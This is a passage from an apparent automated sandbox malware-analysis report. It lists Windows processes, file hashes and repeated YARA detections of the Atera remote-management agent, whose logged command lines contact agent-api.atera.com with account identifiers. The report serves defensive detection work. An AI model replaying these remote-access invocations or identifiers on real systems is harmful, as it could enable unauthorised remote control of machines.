                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000020.00000002.2183431943.00000270551E0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000020.00000002.2170525081.00000270550EA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000020.00000002.2170525081.00000270550E0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000020.00000002.2170525081.00000270550A0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000020.00000002.2170525081.000002705512C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000020.00000002.2266637366.000002706E120000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000020.00000002.2185783714.0000027055958000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000020.00000002.2185783714.0000027055AEB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:33
                                                                                                                                                                                                                                        Start time:11:19:50
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:34
                                                                                                                                                                                                                                        Start time:11:19:50
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:35
                                                                                                                                                                                                                                        Start time:11:19:50
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cscript.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                                                                                                                                                                                                                        Imagebase:0x7ff6cc2d0000
                                                                                                                                                                                                                                        File size:161'280 bytes
                                                                                                                                                                                                                                        MD5 hash:24590BF74BBBBFD7D7AC070F4E3C44FD
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000023.00000002.1709494324.00000218AF010000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:36
                                                                                                                                                                                                                                        Start time:11:19:51
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\sppsvc.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\sppsvc.exe
                                                                                                                                                                                                                                        Imagebase:0x7ff7c7fc0000
                                                                                                                                                                                                                                        File size:4'630'384 bytes
                                                                                                                                                                                                                                        MD5 hash:320823F03672CEB82CC3A169989ABD12
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:37
                                                                                                                                                                                                                                        Start time:11:19:55
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "8a9134ff-5e44-480a-9a18-d667aeeec188" agent-api.atera.com/Production 443 or8ixLi90Mf "syncprofile" 001Q300000MHGA9IAP
                                                                                                                                                                                                                                        Imagebase:0x22abff10000
                                                                                                                                                                                                                                        File size:396'336 bytes
                                                                                                                                                                                                                                        MD5 hash:B50005A1A62AFA85240D1F65165856EB
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000025.00000002.1811600613.0000022AC018C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000025.00000002.1831057497.0000022ADA0F5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000025.00000002.1831202806.0000022ADA106000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000025.00000002.1811600613.0000022AC0180000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000025.00000002.1813948689.0000022AC09F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000025.00000002.1811600613.0000022AC020D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000025.00000002.1831031514.0000022AD9EF7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000025.00000002.1813948689.0000022AC0ADD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000025.00000002.1841698433.00007FFB03049000.00000004.00000001.01000000.0000001E.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000025.00000002.1827657488.0000022AD90B0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000025.00000002.1812597098.0000022AC03B0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000025.00000002.1811600613.0000022AC01C5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000025.00000002.1812887385.0000022AC0862000.00000002.00000001.01000000.0000001F.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000025.00000000.1677575277.0000022ABFF12000.00000002.00000001.01000000.0000001D.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000025.00000002.1811166531.0000022AC0000000.00000004.00000020.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000025.00000002.1811600613.0000022AC01C1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000025.00000002.1813948689.0000022AC0F93000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:38
                                                                                                                                                                                                                                        Start time:11:19:55
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:39
                                                                                                                                                                                                                                        Start time:11:20:03
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k smphost
                                                                                                                                                                                                                                        Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:42
                                                                                                                                                                                                                                        Start time:11:20:20
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "5fd723dc-67af-48d2-add5-cb21dbd46c10" agent-api.atera.com/Production 443 or8ixLi90Mf "generalinfo" 001Q300000MHGA9IAP
                                                                                                                                                                                                                                        Imagebase:0x1e4330e0000
                                                                                                                                                                                                                                        File size:177'712 bytes
                                                                                                                                                                                                                                        MD5 hash:31DEF444E6135301EA3C38A985341837
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002A.00000002.2170099989.000001E43405A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002A.00000002.2170099989.000001E434057000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002A.00000002.2168972387.000001E433570000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002A.00000002.2372374653.00007FFB23AF0000.00000004.00000001.01000000.00000013.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002A.00000002.2149932355.000001E433267000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002A.00000002.2149932355.000001E4332A2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002A.00000002.2170099989.000001E433AE3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002A.00000002.2170099989.000001E43400F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002A.00000002.2300042088.000001E44C5BA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002A.00000002.2149932355.000001E433220000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002A.00000002.2261672439.000001E44C2F0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002A.00000002.2170099989.000001E433A71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002A.00000002.2149932355.000001E43325B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002A.00000002.2275598448.000001E44C3EC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002A.00000002.2170099989.000001E433C46000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002A.00000002.2170099989.000001E433AB7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002A.00000002.2170099989.000001E433AF3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:43
                                                                                                                                                                                                                                        Start time:11:20:20
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:44
                                                                                                                                                                                                                                        Start time:11:20:20
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                                                                                                                                                                                                                        Imagebase:0x7ff71e3c0000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002C.00000002.2110035392.000001F140C40000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002C.00000003.1934486823.000001F140E30000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002C.00000002.2110707881.000001F140E10000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002C.00000002.2110035392.000001F140C64000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002C.00000002.2110035392.000001F140C4B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:45
                                                                                                                                                                                                                                        Start time:11:20:20
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:46
                                                                                                                                                                                                                                        Start time:11:20:20
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cscript.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                                                                                                                                                                                                                        Imagebase:0x7ff6cc2d0000
                                                                                                                                                                                                                                        File size:161'280 bytes
                                                                                                                                                                                                                                        MD5 hash:24590BF74BBBBFD7D7AC070F4E3C44FD
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002E.00000002.2092308272.000001449A500000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:47
                                                                                                                                                                                                                                        Start time:11:20:22
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "d4d269d4-e88c-4b28-b73e-8aa8339ce0f7" agent-api.atera.com/Production 443 or8ixLi90Mf "checkforupdates" 001Q300000MHGA9IAP
                                                                                                                                                                                                                                        Imagebase:0x10b6e4b0000
                                                                                                                                                                                                                                        File size:55'344 bytes
                                                                                                                                                                                                                                        MD5 hash:D11B2139D29E79D795054C3866898B7F
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002F.00000002.2398777633.0000010B6F674000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002F.00000002.2274299424.0000010B00276000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002F.00000002.2396556042.0000010B6F640000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002F.00000000.1946868282.0000010B6E4B2000.00000002.00000001.01000000.00000029.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002F.00000002.2375885446.0000010B6E79B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002F.00000002.2398777633.0000010B6F6D4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002F.00000002.2374062849.0000010B6E6B0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002F.00000002.2398400715.0000010B6F66D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002F.00000002.2270629111.0000000689FB3000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002F.00000002.2375885446.0000010B6E6FF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002F.00000002.2372906148.0000010B6E685000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002F.00000002.2375885446.0000010B6E6F0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002F.00000002.2394795109.0000010B6E970000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002F.00000002.2274299424.0000010B00001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002F.00000002.2375885446.0000010B6E73C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002F.00000002.2374062849.0000010B6E6BC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002F.00000002.2274299424.0000010B00176000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002F.00000002.2375885446.0000010B6E6CF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000002F.00000002.2274299424.0000010B00287000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:48
                                                                                                                                                                                                                                        Start time:11:20:22
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:49
                                                                                                                                                                                                                                        Start time:11:20:24
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe" schedulerrun
                                                                                                                                                                                                                                        Imagebase:0x2e7230a0000
                                                                                                                                                                                                                                        File size:55'344 bytes
                                                                                                                                                                                                                                        MD5 hash:D11B2139D29E79D795054C3866898B7F
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2040710352.000002E72329F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2144565646.000002E723C83000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2040710352.000002E723305000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2040710352.000002E723288000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
